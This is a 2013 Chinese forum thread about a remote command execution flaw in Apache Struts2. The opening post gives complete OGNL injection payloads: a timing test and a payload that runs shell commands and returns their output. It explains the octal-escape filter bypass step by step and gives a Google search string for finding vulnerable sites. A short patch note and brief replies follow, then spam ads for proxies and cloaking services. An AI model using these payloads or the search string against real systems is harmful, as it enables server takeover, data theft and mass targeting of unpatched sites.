struts2 最新漏洞通杀struts2所有版本

Gabriel · 发表于 2013-7-17 17:07:19

已有很多政府站沦陷了

Struts 2是在struts 和WebWork的技术基础上进行了合并的全新的框架。其全新的Struts 2的体系结构与Struts 1的体系结构的差别巨大。Struts 2以WebWork为核心，采用拦截器的机制来处理用户的请求，这样的设计也使得业务逻辑控制器能够与Servlet API完全脱离开，所以Struts 2可以理解为WebWork的更新产品.

近期Struts2爆发了一远程命令执行漏洞,,各种版本的漏洞利用工具让CNVD非常的蛋疼.下面贴出 livers大大针对此漏洞的分析.
以POST的方式提交绕过对输入参数的部分过滤。
('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\[email protected]@EMPTY_SET')(c))&(d)(('@java.lang.Thread@sleep(8000)')(d))
当前线程sleep 8S
命令执行主要是通过ognl对象的上下文内置静态函数进行执行的。
如@Runtime@getRuntime().exec
@class@method 访问静态方法
xwork 的ognl语句执行，变量必须要带有#，之前通过\0023 (16进制的#) 来绕过，官方补丁屏蔽了这种但是可以利用\43(8进制的#)进行绕过。
实现交互的shell.
('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\[email protected]@EMPTY_SET')(c))&(g)(('\43mycmd\75\'ls\40\u002dl\'')(d))&(h)(('\43myret\[email protected]@getRuntime().exec(\43mycmd)')(d))&(i)(('\43mydat\75new\40java.io.DataInputStream(\43myret.getInputStream())')(d))&(j)(('\43myres\75new\40byte[51020]')(d))&(k)(('\43mydat.readFully(\43myres)')(d))&(l)(('\43mystr\75new\40java.lang.String(\43myres)')(d))&(m)(('\43myout\[email protected]@getResponse()')(d))&(n)(('\43myout.getWriter().println(\43mystr)')(d))

\75 (=的8进制)\40（空格的8进制）ongl语句中执行的参数不允许出现空格。当然包括其他
老版本的正则是^#=:都不允许，通杀的话是用\40来替代。
这样上面就是
1.设置上下文denyMethodExecution=false 运行方法执行
[email protected]@EMPTY_SET （@class@调用静态变量）
设置外部拦截器为空
3.mycmd=“ls -l” 定义我们的执行命令的变量
[email protected]@getRuntime().exec(\43mycmd)') (调用静态方法执行我们的变量)
5.mydat=new java.io.DataInputStream(\43myret.getInputStream())') 获取输入流(post)
6.myres=new data[51020];mydat.readfully(myres); 读取输入流
(5,6为了转换输入流的类型)
7.mystr=new java.lang.String(#myres) ;定义并赋值输入流
8.myout=org.apache.struts2.ServletActionContext@getResponse() ;得到repsonse的数据
9.myout.getWriter().println(#mystr) ;把response的数据打印到屏幕上。
Struts2漏洞修复方案：
下载最新的版本2.3.4：http://struts.apache.org/download.cgi#struts234
或者修改对应jar中的ongl处理逻辑,然后编译打包替换旧的文件。

谷歌关键字：

inurl:common/common_info.action?wid=

复制代码

网络上也有漏洞利用工具，有兴趣的童鞋自己去找吧。

http://zone.wooyun.org/content/5159

复制代码

xee · 发表于 2013-7-17 20:18:50

看来波及的范围比较广，影响还是不小的

blackhat · 发表于 2013-7-17 21:02:55

楼主做网络安全的？

Gabriel · 发表于 2013-7-18 08:02:00

blackhat 发表于 2013-7-17 21:02
楼主做网络安全的？

非也，刚好看到了，就把他发出来。

riskstar · 发表于 2013-7-18 15:18:59

国内的主流大站都被检测出来存在此漏洞

80web · 发表于 2013-7-19 21:41:48

昨天乌云都被刷屏了。佩服那些白帽子。。。。。。。

		自动登录	找回密码
密码			立即注册

谷歌+Bing+TT+MSN官方代理	⚡️按条S5代理⚡️静态⚡️独享⚡️5G	⚡️最干净<Wifi住宅+5G移动>IP代理	泰国仓储，本土仓发货2-3元/单
指纹浏览器，就用AdsPower	谷歌/FB/Bing/Yahoo代理商开户	7200W全球动态不重复住宅IP代理	全球优质流量，选TrafficStars
出售Facebook,友缘号,FB广告号,ins	FB/TT/KW 加白开户	ADPLEXITY + ADVERTCN	比Adplexity还好用的Spy工具
广	告	开	户
FB/Google/TK	海外多媒体	极速	下户
BINOM TRACKER 60% OFF!	MediaGo+Taboola+Ob开户	百度国际MediaGo⚡️让产品狂奔全球	百度国际，高点击转化，快速放量
百度国际MediaGo，独家原生流量	虚拟信用卡+独立站收款	行业首创新型指纹Cloak, 谷歌奇效!	Kookeey⚡️100%独享⚡️原生住宅IP
⚡IPFoxy住宅代理全场88折⚡	免账户投放 FB 广告（送项目）	2024做什么 - Media buy 项目库	免费黑五教程（持续更新、欢迎交流）
Facebook 批量上广告	Bridgeway - 联盟营销网络	IPCola 全新住宅代理 ⚡️ 免费试用	各种主页、账单户、BM户（优势）
⚡️个人户，bm户不限额，账单户	Adsterra 的CPA/CPM/CPC 网站流量	在线注册美国/英国/香港等海外公司	EU KETO/CBD - Jumbleberry
FB二三解1元/个	9Proxy ⚡️ $0.04/IP, 无限带宽	cloak斗篷/ss/nutra/cpa/Dating	E.PN 虚拟卡
Asocks代理服务器$3/GB	高薪诚求实力FB投手（独立站）	《全新虚拟卡+全球收付款》	广告位出租
全球低价纯净住宅/移动IP-免费试用	广告代投, 东南亚物流, 虚拟信用卡	VMLogin指纹浏览器+多账号防关联

struts2 最新漏洞通杀struts2所有版本

社区QQ达人